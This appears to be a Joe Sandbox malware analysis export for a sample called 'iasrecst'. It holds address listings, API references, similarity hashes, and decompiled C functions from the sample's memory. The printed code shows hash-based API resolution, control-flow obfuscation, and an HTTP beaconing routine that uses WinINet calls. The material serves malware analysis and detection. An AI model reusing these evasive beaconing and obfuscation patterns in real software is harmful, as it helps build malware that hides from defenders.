0x022c196f
0x022c1980
0x022c1980
0x022c1980
0x022c1980
0x022c1985
0x00000000
0x00000000
0x022c198b
0x022c1a6f
0x022c1a72
0x00000000
0x022c1991
0x022c1996
0x022c19f3
0x022c19f8
0x022c19fd
0x022c1a10
0x022c1a15
0x022c1a15
0x022c1a1c
0x022c1a25
0x022c1a3d
0x022c1a3d
0x022c1a46
0x022c1a48
0x022c1a4a
0x022c1a4e
0x00000000
0x022c1a54
0x022c1a57
0x022c1a5c
0x022c1a60
0x00000000
0x022c1a60
0x022c1998
0x022c199d
0x022c19be
0x022c19c5
0x022c19d8
0x022c19dd
0x022c19dd
0x022c19e2
0x022c19e4
0x022c19e8
0x022c19ec
0x00000000
0x022c199f
0x022c19a4
0x022c1c1c
0x022c1c1e
0x022c1c25
0x022c1c38
0x022c1c3d
0x022c1c3d
0x022c1c4b
0x022c1c52
0x022c1c66
0x00000000
0x00000000
0x00000000
0x022c19a4
0x022c199d
0x022c1996
0x00000000
0x022c198b
0x022c1a81
0x022c1ad0
0x022c1ad7
0x022c1aea
0x022c1aef
0x022c1aef
0x022c1af9
0x022c1b09
0x022c1b0c
0x022c1b11
0x022c1b16
0x022c1b19
0x022c1b20
0x022c1b33
0x022c1b38
0x022c1b38
0x022c1b42
0x022c1b52
0x022c1b55
0x022c1b5a
0x022c1b5d
0x022c1b67
0x022c1b6c
0x022c1b72
0x022c1b76
0x022c1b8e
0x022c1b90
0x022c1b90
0x022c1bad
0x022c1baf
0x022c1bb2
0x022c1bb9
0x022c1bcc
0x022c1bd1
0x022c1bd1
0x022c1bd8
0x022c1bda
0x022c1be1
0x022c1bf4
0x022c1bf9
0x022c1bf9
0x022c1c02
0x022c1c04
0x022c1c08
0x00000000
0x022c1a83
0x022c1a88
0x00000000
0x022c1a8e
0x022c1a8e
0x022c1a93
0x022c1a96
0x022c1a9a
0x022c1aad
0x022c1ab2
0x022c1ab2
0x022c1aba
0x022c1abc
0x022c1ac0
0x022c1ac3
0x022c1ac8
0x022c196f
0x022c196f
0x022c196f
0x00000000
0x022c196f
0x022c196f
0x022c1a88
0x00000000
0x022c19aa
0x022c19aa
0x022c19b4
0x022c19bd
0x00000000
0x022c19bd

APIs

RtlAllocateHeap.NTDLL(00000000,00000008,?), ref: 022C1A46

Strings

Ei, xrefs: 022C1B78
Ei, xrefs: 022C1A9C
Ei, xrefs: 022C1AD9
Ei, xrefs: 022C1C27
Ei, xrefs: 022C1B22

Memory Dump Source

Source File: 00000001.00000002.496688716.00000000022C1000.00000020.00000001.sdmp, Offset: 022C0000, based on PE: true

Associated: 00000001.00000002.496676614.00000000022C0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.496717188.00000000022CD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.496745488.00000000022D0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_22c0000_iasrecst.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: Ei$Ei$Ei$Ei$Ei
API String ID: 1279760036-866448414
Opcode ID: 293c17cfa872fda889f25f50e3248717a4c4c5e7e6ca1e1e4634923abae927a5
Instruction ID: 74496cc918cc5f070d71f5ec326ff49b3130267f3d34ace661f5d62f6dabf6f8
Opcode Fuzzy Hash: 293c17cfa872fda889f25f50e3248717a4c4c5e7e6ca1e1e4634923abae927a5
Instruction Fuzzy Hash: 4E71C371A203019BD714EBE8A49566B77E6AF80344F348E6DE449CB349EE35DC118BE2

Uniqueness

Uniqueness Score: -1.00%

Function 004171BC, Relevance: 9.0, APIs: 6, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004171BC(void* __ecx) {
				int _t6;
				struct HDC__* _t17;
				void* _t18;

				_t18 = __ecx;
				_t6 = GetSystemMetrics(0xb); // executed
				 *((intOrPtr*)(_t18 + 8)) = _t6;
				 *((intOrPtr*)(_t18 + 0xc)) = GetSystemMetrics(0xc);
				if( *((intOrPtr*)(_t18 + 0x68)) == 0) {
					E00426041();
				} else {
					E00426011();
				}
				_t17 = GetDC(0);
				 *((intOrPtr*)(_t18 + 0x18)) = GetDeviceCaps(_t17, 0x58);
				 *((intOrPtr*)(_t18 + 0x1c)) = GetDeviceCaps(_t17, 0x5a);
				return ReleaseDC(0, _t17);
			}

0x004171c5
0x004171c9
0x004171cd
0x004171d6
0x004171d9
0x004171e2
0x004171db
0x004171db
0x004171db
0x004171f5
0x004171ff
0x00417207
0x00417213

APIs

KiUserCallbackDispatcher.NTDLL ref: 004171C9
GetSystemMetrics.USER32 ref: 004171D0
GetDC.USER32(00000000), ref: 004171E9
GetDeviceCaps.GDI32(00000000,00000058), ref: 004171FA
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00417202
ReleaseDC.USER32 ref: 0041720A

Part of subcall function 00426011: GetSystemMetrics.USER32 ref: 00426023
Part of subcall function 00426011: GetSystemMetrics.USER32 ref: 0042602D

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: MetricsSystem$CapsDevice$CallbackDispatcherReleaseUser
String ID:
API String ID: 1031845853-0
Opcode ID: 49e5c97296a7b072187f1378aed9eba7ef52a70a37e1ec16940f220f5672bfea
Instruction ID: 659ed99cd56d5ad3ccdcd4dadc3a54c49a5c6667fc5102f6d19300758eb0a966
Opcode Fuzzy Hash: 49e5c97296a7b072187f1378aed9eba7ef52a70a37e1ec16940f220f5672bfea
Instruction Fuzzy Hash: BBF03030740704AEE230AB629C89B67B7A4EF80755F51442FFA0196290CFB498459FA9

Uniqueness

Uniqueness Score: -1.00%

Function 022C2C20, Relevance: 7.8, APIs: 5, Instructions: 287
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E022C2C20(void* __ecx, void* __edx) {
				void* __ebx;
				void* __ebp;
				void* _t36;
				void* _t38;
				void* _t40;
				void* _t47;
				signed int _t51;
				void* _t52;
				void* _t58;
				void* _t60;
				void* _t61;
				void* _t62;
				void* _t65;
				void* _t66;
				WCHAR* _t68;
				void* _t83;
				void* _t87;
				void* _t132;
				void* _t133;
				void* _t135;
				void* _t136;
				void* _t138;
				WCHAR* _t140;
				long _t142;
				void* _t146;
				void* _t147;
				void* _t150;
				void* _t151;

				_t146 =  *(_t147 + 0x3c);
				 *(_t147 + 0x30) = __ecx;
				_t136 = 0x21ed7693;
				_t83 =  *(_t147 + 0x30);
				 *(_t147 + 0x30) = __edx;
				 *(_t147 + 0x14) = 0;
				 *(_t147 + 0x24) = 0;
				 *(_t147 + 0x20) = 0;
				 *(_t147 + 0x10) = 0;
				while(1) {
					L1:
					_t132 =  *(_t147 + 0x18);
					while(1) {
						L2:
						_t150 = _t136 - 0xdefb712;
						if(_t150 > 0) {
							goto L36;
						}
						L3:
						if(_t150 == 0) {
							__eflags =  *0x22ce12c;
							if( *0x22ce12c == 0) {
								 *0x22ce12c = E022C3E80(_t83, E022C3F20(0x2ba535f4), 0xc71f7f57, _t146);
							}
							_t36 = InternetOpenW( *(_t147 + 0x24), 0, 0, 0, 0); // executed
							__eflags = _t36;
							 *(_t147 + 0x1c) = _t36;
							_t136 =  !=  ? 0x2a5ea3fb : 0xe955358;
							_t38 =  *0x22cdea8;
							__eflags = _t38;
							if(_t38 == 0) {
								_t38 = E022C3E80(_t83, E022C3F20(0xbb398380), 0x97f883e, _t146);
								 *0x22cdea8 = _t38;
							}
							_t133 =  *_t38();
							_t40 =  *0x22ce1a0;
							__eflags = _t40;
							if(_t40 == 0) {
								_t40 = E022C3E80(_t83, E022C3F20(0xbb398380), 0x26c3f343, _t146);
								 *0x22ce1a0 = _t40;
							}
							 *_t40(_t133, 0,  *(_t147 + 0x14));
							goto L34;
						} else {
							_t151 = _t136 - 0x67ae942;
							if(_t151 > 0) {
								__eflags = _t136 - 0x6b479f3;
								if(_t136 == 0x6b479f3) {
									__eflags =  *0x22ce128;
									if( *0x22ce128 == 0) {
										 *0x22ce128 = E022C3E80(_t83, E022C3F20(0x2ba535f4), 0x6972c784, _t146);
									}
									InternetCloseHandle(_t83); // executed
									_t136 = 0x12dff647;
									continue;
								} else {
									__eflags = _t136 - 0x8581448;
									if(_t136 != 0x8581448) {
										goto L34;
									} else {
										__eflags = _t146;
										if(_t146 == 0) {
											_t140 =  *(_t147 + 0x20);
										} else {
											_t140 = E022C34C0(0x22cd1f0);
											 *(_t147 + 0x20) = _t140;
										}
										_t52 =  *0x22ce1cc;
										__eflags = _t52;
										if(_t52 == 0) {
											_t52 = E022C3E80(_t83, E022C3F20(0x2ba535f4), 0xc136cec1, _t146);
											 *0x22ce1cc = _t52;
										}
										_t83 =  *_t52(_t132, _t140,  *((intOrPtr*)(_t147 + 0x50)), 0, 0, 0, 0x844cc300, 0);
										E022C3460(_t140);
										__eflags = _t83;
										_t136 =  !=  ? 0x4e6dd92 : 0x12dff647;
										continue;
									}
								}
							} else {
								if(_t151 == 0) {
									__eflags = E022C29B0(_t83,  *((intOrPtr*)(_t147 + 0x48)));
									_t87 =  !=  ? 1 :  *(_t147 + 0x10);
									__eflags = _t87;
									 *(_t147 + 0x10) = _t87;
									L15:
									_t136 = 0x6b479f3;
									continue;
								} else {
									if(_t136 == 0x1e6c40f) {
										_t47 =  *0x22ce128;
										__eflags = _t47;
										if(_t47 == 0) {
											_t47 = E022C3E80(_t83, E022C3F20(0x2ba535f4), 0x6972c784, _t146);
											 *0x22ce128 = _t47;
										}
										 *_t47( *(_t147 + 0x1c));
									} else {
										if(_t136 != 0x4e6dd92) {
											L34:
											__eflags = _t136 - 0xe955358;
											if(_t136 != 0xe955358) {
												goto L1;
											}
										} else {
											if(_t146 == 0) {
												_t142 = 0;
												_t135 = 0;
												__eflags = 0;
											} else {
												_t142 =  *(_t146 + 4);
												_t135 =  *_t146;
											}
											if( *0x22ce20c == 0) {
												 *0x22ce20c = E022C3E80(_t83, E022C3F20(0x2ba535f4), 0x182fe063, _t146);
											}
											_t51 = HttpSendRequestW(_t83,  *(_t147 + 0x4c), 0xffffffff, _t135, _t142); // executed
											asm("sbb esi, esi");
											_t136 = ( ~_t51 & 0x1a4d9a07) + 0x6b479f3;
											while(1) {
												L1:
												_t132 =  *(_t147 + 0x18);
												while(1) {
													L2:
													_t150 = _t136 - 0xdefb712;
													if(_t150 > 0) {
														goto L36;
													}
													goto L3;
												}
												goto L36;
											}
										}
									}
								}
							}
						}
						L64:
						return  *(_t147 + 0x10);
						L65:
						L36:
						__eflags = _t136 - 0x210213fa;
						if(__eflags > 0) {
							__eflags = _t136 - 0x21ed7693;
							if(_t136 == 0x21ed7693) {
								_t136 = 0x1e47f06d;
								continue;
							} else {
								__eflags = _t136 - 0x2a5ea3fb;
								if(_t136 != 0x2a5ea3fb) {
									goto L34;
								} else {
									__eflags =  *0x22ce178;
									if( *0x22ce178 == 0) {
										 *0x22ce178 = E022C3E80(_t83, E022C3F20(0x2ba535f4), 0x48c489b5, _t146);
									}
									_t58 = InternetConnectW( *(_t147 + 0x38),  *(_t147 + 0x4c),  *(_t147 + 0x44), 0, 0, 3, 0, 0); // executed
									_t132 = _t58;
									__eflags = _t132;
									 *(_t147 + 0x18) = _t132;
									_t136 =  !=  ? 0x8581448 : 0x1e6c40f;
									continue;
								}
							}
						} else {
							if(__eflags == 0) {
								_t60 =  *0x22cdde8;
								 *((intOrPtr*)(_t147 + 0x28)) = 4;
								__eflags = _t60;
								if(_t60 == 0) {
									_t60 = E022C3E80(_t83, E022C3F20(0x2ba535f4), 0x46124712, _t146);
									 *0x22cdde8 = _t60;
								}
								_t61 =  *_t60(_t83, 0x20000013, _t147 + 0x34, _t147 + 0x2c, 0);
								__eflags = _t61;
								if(_t61 == 0) {
									goto L15;
								} else {
									__eflags =  *((intOrPtr*)(_t147 + 0x2c)) - 0xc8;
									if( *((intOrPtr*)(_t147 + 0x2c)) != 0xc8) {
										goto L15;
									} else {
										_t136 = 0x67ae942;
										continue;
									}
								}
								goto L65;
							} else {
								__eflags = _t136 - 0x12dff647;
								if(_t136 == 0x12dff647) {
									_t62 =  *0x22ce128;
									__eflags = _t62;
									if(_t62 == 0) {
										_t62 = E022C3E80(_t83, E022C3F20(0x2ba535f4), 0x6972c784, _t146);
										 *0x22ce128 = _t62;
									}
									 *_t62(_t132);
									_t136 = 0x1e6c40f;
									continue;
								} else {
									__eflags = _t136 - 0x1e47f06d;
									if(_t136 != 0x1e47f06d) {
										goto L34;
									} else {
										 *(_t147 + 0x24) = 0x200;
										_t138 = E022C42F0(_t83, 0x200);
										__eflags = _t138;
										if(_t138 != 0) {
											_t65 =  *0x22cdbf0;
											__eflags = _t65;
											if(_t65 == 0) {
												_t65 = E022C3E80(_t83, E022C3F20(0x50c9f0c1), 0xd16bf1bd, _t146);
												 *0x22cdbf0 = _t65;
											}
											_t66 =  *_t65(0, _t138, _t147 + 0x24); // executed
											__eflags = _t66;
											if(_t66 == 0) {
												_t68 = E022C56A0(_t138, _t146);
												_t147 = _t147 - 8 + 8;
												 *(_t147 + 0x14) = _t68;
											}
											E022C4250(_t83, _t138);
										}
										_t136 = 0xdefb712;
										continue;
									}
								}
							}
						}
						goto L64;
					}
				}
			}

0x022c2c25
0x022c2c2c
0x022c2c30
0x022c2c35
0x022c2c3a
0x022c2c3e
0x022c2c46
0x022c2c4e
0x022c2c56
0x022c2c5a
0x022c2c5a
0x022c2c5a
0x022c2c60
0x022c2c60
0x022c2c60
0x022c2c66
0x00000000
0x00000000
0x022c2c6c
0x022c2c6c
0x022c2dcf
0x022c2dd1
0x022c2de9
0x022c2de9
0x022c2dfa
0x022c2dfc
0x022c2dfe
0x022c2e0c
0x022c2e0f
0x022c2e14
0x022c2e16
0x022c2e29
0x022c2e2e
0x022c2e2e
0x022c2e35
0x022c2e37
0x022c2e3c
0x022c2e3e
0x022c2e51
0x022c2e56
0x022c2e56
0x022c2e62
0x00000000
0x022c2c72
0x022c2c72
0x022c2c78
0x022c2d15
0x022c2d1b
0x022c2d9e
0x022c2da0
0x022c2db8
0x022c2db8
0x022c2dbe
0x022c2dc0
0x00000000
0x022c2d1d
0x022c2d1d
0x022c2d23
0x00000000
0x022c2d29
0x022c2d29
0x022c2d2b
0x022c2d3f
0x022c2d2d
0x022c2d37
0x022c2d39
0x022c2d39
0x022c2d43
0x022c2d48
0x022c2d4a
0x022c2d5d
0x022c2d62
0x022c2d62
0x022c2d7e
0x022c2d80
0x022c2d85
0x022c2d91
0x00000000
0x022c2d91
0x022c2d23
0x022c2c7e
0x022c2c7e
0x022c2cfd
0x022c2d04
0x022c2d04
0x022c2d07
0x022c2d0b
0x022c2d0b
0x00000000
0x022c2c80
0x022c2c86
0x022c3008
0x022c300d
0x022c300f
0x022c3022
0x022c3027
0x022c3027
0x022c3030
0x022c2c8c
0x022c2c92
0x022c2e64
0x022c2e64
0x022c2e6a
0x00000000
0x022c2e70
0x022c2c98
0x022c2c9a
0x022c2ca4
0x022c2ca6
0x022c2ca6
0x022c2c9c
0x022c2c9c
0x022c2c9f
0x022c2c9f
0x022c2caf
0x022c2cc7
0x022c2cc7
0x022c2cd5
0x022c2cdb
0x022c2ce3
0x022c2c5a
0x022c2c5a
0x022c2c5a
0x022c2c60
0x022c2c60
0x022c2c60
0x022c2c66
0x00000000
0x00000000
0x00000000
0x022c2c66
0x00000000
0x022c2c60
0x022c2c5a
0x022c2c92
0x022c2c86
0x022c2c7e
0x022c2c78
0x022c3032
0x022c303d
0x00000000
0x022c2e75
0x022c2e75
0x022c2e7b
0x022c2f94
0x022c2f9a
0x022c2ffe
0x00000000
0x022c2f9c
0x022c2f9c
0x022c2fa2
0x00000000
0x022c2fa8
0x022c2fad
0x022c2faf
0x022c2fc7
0x022c2fc7
0x022c2fe2
0x022c2fe4
0x022c2feb
0x022c2fed
0x022c2ff6
0x00000000
0x022c2ff6
0x022c2fa2
0x022c2e81
0x022c2e81
0x022c2f34
0x022c2f39
0x022c2f41
0x022c2f43
0x022c2f56
0x022c2f5b
0x022c2f5b
0x022c2f72
0x022c2f74
0x022c2f76
0x00000000
0x022c2f7c
0x022c2f7c
0x022c2f84
0x00000000
0x022c2f8a
0x022c2f8a
0x00000000
0x022c2f8a
0x022c2f84
0x00000000
0x022c2e87
0x022c2e87
0x022c2e8d
0x022c2f03
0x022c2f08
0x022c2f0a
0x022c2f1d
0x022c2f22
0x022c2f22
0x022c2f28
0x022c2f2a
0x00000000
0x022c2e8f
0x022c2e8f
0x022c2e95
0x00000000
0x022c2e97
0x022c2e9c
0x022c2ea9
0x022c2eab
0x022c2ead
0x022c2eaf
0x022c2eb4
0x022c2eb6
0x022c2ec9
0x022c2ece
0x022c2ece
0x022c2edb
0x022c2edd
0x022c2edf
0x022c2ee6
0x022c2eeb
0x022c2eee
0x022c2eee
0x022c2ef4
0x022c2ef4
0x022c2ef9
0x00000000
0x022c2ef9
0x022c2e95
0x022c2e8d
0x022c2e81
0x00000000
0x022c2e7b
0x022c2c60

APIs

HttpSendRequestW.WININET(?,?,000000FF,00000000,00000000), ref: 022C2CD5
InternetCloseHandle.WININET(?), ref: 022C2DBE
InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 022C2DFA
ObtainUserAgentString.URLMON(00000000,00000000,00000200), ref: 022C2EDB
InternetConnectW.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 022C2FE2

Memory Dump Source

Source File: 00000001.00000002.496688716.00000000022C1000.00000020.00000001.sdmp, Offset: 022C0000, based on PE: true

Associated: 00000001.00000002.496676614.00000000022C0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.496717188.00000000022CD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.496745488.00000000022D0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_22c0000_iasrecst.jbxd

Yara matches

Similarity

API ID: Internet$AgentCloseConnectHandleHttpObtainOpenRequestSendStringUser
String ID:
API String ID: 1741791824-0
Opcode ID: 1e56aab545f6cca816c26ec82f0b3341d51d6b49d59002cdf349d67590717137
Instruction ID: ebdc42285c2194def4d32064db252bbb5d5018cc2d61cca70e37e9e2153f8a75
Opcode Fuzzy Hash: 1e56aab545f6cca816c26ec82f0b3341d51d6b49d59002cdf349d67590717137
Instruction Fuzzy Hash: 7FA1B4B1E64302DBDB14AAE89C4476A76D6AB84604F314B6DE855EB358DF709D008BC2

Uniqueness

Uniqueness Score: -1.00%

Function 022C30D0, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 150
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 71%

			E022C30D0() {
				void* __ebx;
				void* __ecx;
				void* __ebp;
				void* _t52;
				intOrPtr* _t68;
				void* _t71;
				intOrPtr _t76;
				intOrPtr _t77;
				intOrPtr* _t85;
				intOrPtr* _t90;
				signed int _t95;
				void* _t100;
				void* _t101;
				signed int _t102;
				void* _t103;
				void* _t104;

				_t76 =  *((intOrPtr*)(_t103 + 0xc));
				_t52 = 0x22788346;
				_t102 =  *(_t103 + 0x10);
				_t100 =  *(_t103 + 0x14);
				_t95 =  *(_t103 + 0x18);
				while(1) {
					L1:
					do {
						while(1) {
							L2:
							_t104 = _t52 - 0xec2173f;
							if(_t104 <= 0) {
								break;
							}
							if(_t52 == 0x22788346) {
								 *(_t103 + 0x10) = 0x3d53;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) << 5;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) + 0xffff5fed;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) >> 8;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) + 0xffffd292;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) >> 4;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) | 0x4ce86fd0;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) >> 0xe;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) ^ 0x8e6c81db;
								 *(_t103 + 0x18) = 0xed42;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) << 0xd;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) ^ 0xf090f06a;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) * 0x58;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) << 4;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) + 0xffffb93b;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) + 0x26;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) | 0xa9426d85;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) * 0x2a;
								_t52 = 0x27153269;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) ^ 0xfad5ac24;
								continue;
							} else {
								if(_t52 == 0x27153269) {
									_t85 =  *0x22cddd0;
									if(_t85 == 0) {
										_t85 = E022C3E80(_t76, E022C3F20(0x7539f5a2), 0xf789cbad, _t102);
										 *0x22cddd0 = _t85;
									}
									_t95 =  *_t85(_t102 + 0x2c);
									_t52 = 0xb58c94f;
									while(1) {
										L1:
										goto L2;
									}
								} else {
									if(_t52 != 0x302165a1) {
										goto L20;
									} else {
										_t52 =  ==  ? 0x7338f4f : 0xec2173f;
										continue;
									}
								}
							}
							L30:
						}
						if(_t104 == 0) {
							if(_t76 !=  *(_t103 + 0x10)) {
								goto L29;
							} else {
								_t52 = 0x7338f4f;
								goto L2;
							}
						} else {
							if(_t52 == 0x26fef4f) {
								_t90 =  *0x22ce25c;
								if(_t90 == 0) {
									_t90 = E022C3E80(_t76, E022C3F20(0xbb398380), 0x5b27858b, _t102);
									 *0x22ce25c = _t90;
								}
								 *_t90(_t100 + 0x14, _t102 + 0x2c, (_t95 - _t102 - 0x2c >> 1) + 1);
								_t77 =  *((intOrPtr*)(_t103 + 0x1c));
								 *(_t100 + 0x224) =  *(_t77 + 0x1c);
								 *((intOrPtr*)(_t77 + 4)) =  *((intOrPtr*)(_t77 + 4)) + 1;
								 *(_t77 + 0x1c) = _t100;
								goto L29;
							} else {
								if(_t52 == 0x7338f4f) {
									_t68 =  *0x22cdea8;
									if(_t68 == 0) {
										_t68 = E022C3E80(_t76, E022C3F20(0xbb398380), 0x97f883e, _t102);
										 *0x22cdea8 = _t68;
									}
									_t101 =  *_t68();
									if( *0x22cdcec == 0) {
										 *0x22cdcec = E022C3E80(_t76, E022C3F20(0xbb398380), 0xe9233692, _t102);
									}
									_t71 = RtlAllocateHeap(_t101, 8, 0x228); // executed
									_t100 = _t71;
									if(_t100 == 0) {
										L29:
										return 1;
									} else {
										_t52 = 0x26fef4f;
										goto L1;
									}
								} else {
									if(_t52 != 0xb58c94f) {
										goto L20;
									} else {
										_t76 = E022C3D10(_t95);
										_t52 = 0x302165a1;
										while(1) {
											L1:
											goto L2;
										}
									}
								}
							}
						}
						goto L30;
						L20:
					} while (_t52 != 0x2c4ed872);
					return 1;
					goto L30;
				}
			}

0x022c30d2
0x022c30d6
0x022c30dc
0x022c30e1
0x022c30e6
0x022c30ea
0x022c30ea
0x022c30f0
0x022c30f0
0x022c30f0
0x022c30f0
0x022c30f5
0x00000000
0x00000000
0x022c31b1
0x022c3226
0x022c322e
0x022c3233
0x022c323b
0x022c3240
0x022c3248
0x022c324d
0x022c3255
0x022c325a
0x022c3262
0x022c326a
0x022c326f
0x022c327c
0x022c3280
0x022c3285
0x022c328d
0x022c3292
0x022c329f
0x022c32a3
0x022c32a8
0x00000000
0x022c31b3
0x022c31b8
0x022c31ec
0x022c31f4
0x022c320c
0x022c320e
0x022c320e
0x022c321a
0x022c321c
0x022c30ea
0x022c30ea
0x00000000
0x022c30ea
0x022c31ba
0x022c31bf
0x00000000
0x022c31c1
0x022c31cc
0x00000000
0x022c31cc
0x022c31bf
0x022c31b8
0x00000000
0x022c31b1
0x022c30fb
0x022c319c
0x00000000
0x022c31a2
0x022c31a2
0x00000000
0x022c31a2
0x022c3101
0x022c3106
0x022c32b5
0x022c32bd
0x022c32d5
0x022c32d7
0x022c32d7
0x022c32ee
0x022c32f0
0x022c32f7
0x022c32fd
0x022c3300
0x00000000
0x022c310c
0x022c3111
0x022c312e
0x022c3135
0x022c3148
0x022c314d
0x022c314d
0x022c3154
0x022c315d
0x022c3175
0x022c3175
0x022c3182
0x022c3184
0x022c3188
0x022c3306
0x022c330d
0x022c318e
0x022c318e
0x00000000
0x022c318e
0x022c3113
0x022c3118
0x00000000
0x022c311e
0x022c3125
0x022c3127
0x022c30ea
0x022c30ea
0x00000000
0x022c30ea
0x022c30ea
0x022c3118
0x022c3111
0x022c3106
0x00000000
0x022c31d4
0x022c31d4
0x022c31e9
0x00000000
0x022c31e9

APIs

RtlAllocateHeap.NTDLL(00000000,00000008,00000228), ref: 022C3182

Strings

B, xrefs: 022C3262
&, xrefs: 022C328D
S=, xrefs: 022C3226

Memory Dump Source

Source File: 00000001.00000002.496688716.00000000022C1000.00000020.00000001.sdmp, Offset: 022C0000, based on PE: true

Associated: 00000001.00000002.496676614.00000000022C0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.496717188.00000000022CD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.496745488.00000000022D0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_22c0000_iasrecst.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: &$B$S=
API String ID: 1279760036-3580750612
Opcode ID: da755f7eef131344e5a1f026fe787fdca60f936b1b979cbd8a52177d3592efc2
Instruction ID: 62dc6e4cfa61eba85a2d9202f349660fc5c11de36845305429707f5abf5fcb0a
Opcode Fuzzy Hash: da755f7eef131344e5a1f026fe787fdca60f936b1b979cbd8a52177d3592efc2
Instruction Fuzzy Hash: E751E672A143029BCB18DEA8948855BB7E6FBD4354F308E5EF046CB318DBB1D9458BD2

Uniqueness

Uniqueness Score: -1.00%

Function 022C9C10, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E022C9C10(void* __ebp) {
				short _v520;
				short _v1040;
				char _v1044;
				void* __ebx;
				void* _t7;
				intOrPtr* _t9;
				intOrPtr* _t43;
				void* _t46;
				void* _t49;

				_t46 = __ebp;
				_t7 = 0x2c176d24;
				goto L1;
				do {
					while(1) {
						L1:
						_t49 = _t7 - 0x2c176d24;
						if(_t49 > 0) {
							break;
						}
						if(_t49 == 0) {
							_t7 = 0x2ca09120;
							continue;
						} else {
							if(_t7 == 0x17e35087) {
								_v1044 = 0x104;
								if( *0x22cded0 == 0) {
									 *0x22cded0 = E022C3E80(0, E022C3F20(0xbb398380), 0x23563937, _t46);
								}
								_t43 =  *0x22cdf2c;
								if(_t43 == 0) {
									_t43 = E022C3E80(0, E022C3F20(0xbb398380), 0xd0ee7032, _t46);
									 *0x22cdf2c = _t43;
								}
								 *_t43(GetCurrentProcess(), 0,  &_v1040,  &_v1044); // executed
								_t7 = 0x2c13ef60;
								continue;
							} else {
								if(_t7 == 0x2c13ef60) {
									if( *0x22cdd80 == 0) {
										 *0x22cdd80 = E022C3E80(0, E022C3F20(0xbb398380), 0xcb2f8494, _t46);
									}
									lstrcmpiW( &_v520,  &_v1040); // executed
									_t26 =  !=  ? 1 : 0;
									_t22 =  !=  ? 1 : 0;
									return  !=  ? 1 : 0;
								} else {
									goto L5;
								}
							}
						}
						L20:
					}
					if(_t7 != 0x2ca09120) {
						goto L5;
					} else {
						_t9 =  *0x22cde58;
						if(_t9 == 0) {
							_t9 = E022C3E80(0, E022C3F20(0xbb398380), 0xb1aefb5, _t46);
							 *0x22cde58 = _t9;
						}
						 *_t9(0,  &_v520, 0x104);
						_t7 = 0x17e35087;
						goto L1;
					}
					goto L20;
					L5:
				} while (_t7 != 0x3e45350);
				return 0;
				goto L20;
			}

0x022c9c10
0x022c9c16
0x022c9c1e
0x022c9c20
0x022c9c20
0x022c9c20
0x022c9c20
0x022c9c25
0x00000000
0x00000000
0x022c9c2b
0x022c9cc9
0x00000000
0x022c9c31
0x022c9c36
0x022c9c5c
0x022c9c66
0x022c9c80
0x022c9c80
0x022c9c86
0x022c9c8e
0x022c9ca6
0x022c9ca8
0x022c9ca8
0x022c9cbd
0x022c9cbf
0x00000000
0x022c9c38
0x022c9c3d
0x022c9d24
0x022c9d3c
0x022c9d3c
0x022c9d4e
0x022c9d58
0x022c9d5c
0x022c9d65
0x00000000
0x00000000
0x00000000
0x022c9c3d
0x022c9c36
0x00000000
0x022c9c2b
0x022c9cd8
0x00000000
0x022c9cde
0x022c9cde
0x022c9ce5
0x022c9cf8
0x022c9cfd
0x022c9cfd
0x022c9d11
0x022c9d13
0x00000000
0x022c9d13
0x00000000
0x022c9c43
0x022c9c43
0x022c9c55
0x00000000

APIs

GetCurrentProcess.KERNEL32(00000000,?,00000104), ref: 022C9CBA
QueryFullProcessImageNameW.KERNELBASE(00000000), ref: 022C9CBD
lstrcmpiW.KERNELBASE(?,?), ref: 022C9D4E

Strings

79V#, xrefs: 022C9C72

Memory Dump Source

Source File: 00000001.00000002.496688716.00000000022C1000.00000020.00000001.sdmp, Offset: 022C0000, based on PE: true

